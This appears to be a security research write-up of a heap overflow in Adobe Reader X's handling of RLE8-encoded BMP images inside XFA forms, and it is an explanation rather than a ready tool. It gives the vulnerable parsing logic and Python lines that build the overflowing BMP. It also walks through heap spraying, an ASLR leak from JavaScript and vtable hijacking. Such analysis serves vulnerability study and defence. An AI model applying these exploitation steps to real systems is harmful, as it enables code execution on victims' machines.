Adobe Reader X is a powerful software solution developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). Since version 10 it includes the Protected Mode, a sandbox technology similar to the one in Google Chrome which improves the overall security of the product.
Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious bmp image triggers a heap overflow. Quick links: White paper, Exploit generator in python and PoC.pdf for Reader 10.1.4.
The issue presented here is related to the parsing of a BMP file compressed with RLE8. The bug is triggered when Adobe Reader parses a BMP RLE encoded file embedded in an interactive PDF form. The dll responsible of handling the embedded XFA interactive forms(and the BMP) is the AcroForm.api
plugin. So in order to get to the bug we first need to reach the XFA code.
A PDF file can contain interactive Forms in two flavors:
http://blogs.adobe.com/livecycle/2011/09/compatibility-matrix-for-xfa.html
).The XML Forms Architecture (XFA) provides a template-based grammar and a set of processing rules that allow business to build interactive forms. At its simplest, a template-based grammar defines fields in which a user provides data. Among others it defines buttons, textfields, choicelists, images and a scripting API to validate the data and interact. It supports Javascript, XSLT an FormCalc as scripting language. A small XFA containing an image looks like this:
>
> <template xmlns:xfa=“http://www.xfa.org/schema/xfa-template/3.1/”>
> <subform name=“form1” layout=“tb” locale=“en_US” restoreState=“auto”>
> <pageSet>
> <pageArea name=“Page1” id=“Page1”>
> <contentArea x=“0.25in” y=“0.25in” w=“576pt” h=“756pt”/>
> <medium stock=“default” short=“612pt” long=“792pt”/>
> </pageArea>
> </pageSet>
> <subform w=“576pt” h=“756pt”>
> <field name=“ImageField” >
> <ui>
> <imageEdit data=“embed”/>
> </ui>
> <value>
> <image> AAAAA… AAAAAA</image>
> </value>
> </field>
> </subform>
> </subform>
> </template>
>
An XFA Form can be embedded in a common pdf stream and be rendered by all modern versions of Adobe Reader. The PDF catalog must contain the /NeedsRendering
, /Extensions
and /AcroForm
fields. /AcroForm
field must point to the form dictionary. Something like this…
>
> 3 0 obj
> << /Length 12345 >>
> stream
> XFA…
> endsream
> 2 0 obj
> << /XFA 3 0 R >>
> endobj
> 1 0 obj
> << /Type /Catalog
> /NeedsRendering true
> /AcroForm 2 0 R
> /Extensions <<
> /ADBE <<
> /BaseVersion /1.7
> /ExtensionLevel 3
> >>
> >>
> …
> >>
> endobj
>
Graphically a PDF containing an XFA form has this structure:
At this point we can build a PDF containing a XFA Form containing an image. Let’s see the BMP bug.
The BMP can be compressed in two modes, absolute mode and RLE mode. Both modes can occur anywhere in a single bitmap. Ref. http://www.fileformat.info/format/bmp/corion-rle8.htm
The RLE mode is a simple RLE mechanism, the first byte contains the count, the second byte the pixel to be replicated. If the count byte is 0, the second byte is a special, like EOL or delta. In absolute mode, the second byte contains the number of bytes to be copied literally. Each absolute run must be word-aligned that means you might have to add an additional padding byte which is not included in the count. After an absolute run, RLE compression continues.
Second byte | Meaning |
---|---|
0 | End of line |
1 | End of bitmap |
2 | Delta. The next two bytes are the horizontal |
and vertical offsets from the current position | |
to the next pixel. | |
3-255 | Switch to absolute mode |
Consider the followind C
listing. This pseudo code is derived from the function responsible of expanding an RLE encoded BMP, found in AcroForm.api
. The functions feof()
, fread()
and malloc()
are the usual ones. The stream
is a file from where it has already read the complete BMP header, including the height and the width. The main purpose of function is to expand the RLE encoded data. First it allocates enough memory to hold the complete image. Then it reads one byte to decide between one of the two modes: RLE or Absolute. In the RLE mode it repeats the next byte a number of times. In the Absolute mode there are more options implemented as a switch:
char* rle(FILE* stream, unsigned height, unsigned width){
assert(height < 4096 && height < 4096);
char * line;
char aux;
unsigned count;
struct {
unsigned char reps;
unsigned char value;
}cmd;
unsigned char xdelta, ydelta;
unsigned xpos = 0;
unsigned ypos = height - 1;
char * texture = malloc(height*width); //Safe mult!
assert(texture);
while ( !feof(stream)) {
fread(&cmd, 1, 2, stream);
if ( cmd.reps ) {
assert ( ypos < height && cmd.reps + xpos <= width );
for(count = 0; count<cmd.reps; count++) { //RLE Mode, repeat the value
line = texture+(ypos*width);
line[xpos++] = cmd.value;
}
}
else { // if rep is zero then value is a command
switch(cmd.value){
case 0: //End of line
ypos -= 1;
xpos = 0;
break;
case 1: //End of bitmap. Done!
return texture;
case 2: //Delta case, move bmp pointer
read(&xdelta, 1, 1, stream); // read one byte
read(&ydelta, 1, 1, stream); // read one byte
xpos += xdelta;
ypos -= ydelta;
break;
default: // literal case
assert ( ypos < height && cmd.value + xpos <= width );
for(count = 0;count < cmd.value; count++){
fread(&aux, 1, 1, stream);
line = texture+(width*ypos);
line[xpos++] = aux;
}
if ( cmd.value & 1 ) // padding
fread(&aux, 1, 1, stream);
}//switch(cmd.value)
}//if (cmd.reps)
}//while(!feof(stream))
return texture;
}
As you probably found out, there are no asserts at the “delta” case (line 32). So we could move the destination pointers arbitrarily, even outside the limits of the texture buffer. However, there are boundary checks when you try to actually write something to the texture buffer as in the line 39.
Note that this leaves a corner case in which a heap overflow condition can be triggered. Suppose we repeatedly send delta commands advancing the xpos
index. And we continue to do so without trying to write anything until xpos
gets really big, for example 0xffffff00
. To accomplish this, the BMP should contain 0xffffff00/0xff
delta commands each one incrementing the xpos
in 0xff
like this:
> 1. bmp += ‘\x00\x02\xff\x00’ * ((0xffffffff-0xff) / 0xff)
Then after padding, we pass a literal command to actually write up to 0xff
bytes of data directly from the file to the pointed address. But as xpos+len(payload)
overflows the 32bits integer representation, the boundary assertion holds and the overflow is possible.
> 1. bmp += ‘\x00\x02’+chr(0x100-len(payload))+‘\x00’
>
> 2. bmp += ‘\x00’+chr(len(payload))+payload
Summing up, using this bug we can overwrite up to 256
bytes immediately before the texture buffer.
The texture is allocated in the heap using the width and height found in the BMP header. So we control the size of the overflow-able allocation and we need to choose it wisely to overwrite something useful. But first to increase reliability it is better to prepare the heap with a sequence of allocations. We use the well known javascript method for allocating and freeing heap chunks. The exploitation script would be like this:
1000
0x12C
chunks of controlled data. Very likely triggering a LFH of size 0x12C
(0x12 (18)consecutive allocations will guarantee LFH enabled for a given SIZE). 0x12C
bytes is used after the decoding of all images. It contains pointers to the specific vtables and functions. The goal is to read andwrite this structure from javascript.To achieve our goal, we first need to leak some pointer to the javascript interpreter so we could bypass ASLR and DEP. In order to learn the address of some dlls we need to be able to read an object structure from javascript. To get this we’ll load a broken BMP image corrupting an LFH chunk header thus trick the allocator into believing that an alive javascript string memory is free.
{1 , 0x12C}
, its pixel texture (of size 0x12C
) will be allocated in one of the prepared holes. The allocator will most likely assign one of the previously prepared holes to it. > _If you can overflow into a chunk that will be freed, the SegmentOffset in the heap chunk header can be used to point to another valid _HEAP_ENTRY. This could lead to controlling data that was previously allocated. See https://www.lateralsecurity.com/downloads/hawkes_ruxcon-nov-2008.pdf
_
At this point we have a javascript string using memory that is known to be free. An allocation of 0x12C will probably be assigned to the same memory overlapping the javascript string. We aim for a javascript string to share the same memory with an object containing vtables so we can learn the location of some dll from the js interpreter. As we have chosen the chunk size carefully, this happens automatically and an interesting object gets allocated in the memory actually pointed by one of the javascript strings
Now lets’ iterate over all javascript strings looking for the one that has changed
for (i=0; i < spray.size; i+=1)
if ( spray.x[i] != null &&
spray.x[i][0] != "\u5858"){
…
}
If found, parse its contents and discover the address of AcroRd32.dll
acro = (( util.unpackAt(spray.x[i], 14) >> 16) - offset) << 16;
break;
At this point we have pinpointed the exact string index that shares the memory with an imgstruct and leaked the address of AcroRd.dll to the javascript interpreter.
In javascript, strings are simply not writable. You need to free the old string and make a new copy of the string with the modifications you like. Usually, if the new string is the same size as the old one it will be allocated in the same spot. So to change the object contents we need to free the selected javascript string and realloc another in the same memory with different content.
Calling the doc.close()
function from the js interpreter will trigger the unload of all loaded XFA images and the use of the overwritten vtable
Thus the replaced pointers in the object are used once more in the destructors and the control flow is captured. One last step involves to heap spray a pointer bed at a known address. A more specific technique(provided upon request) in which other heap addresses are leaked to the interpreter doesn’t need this step.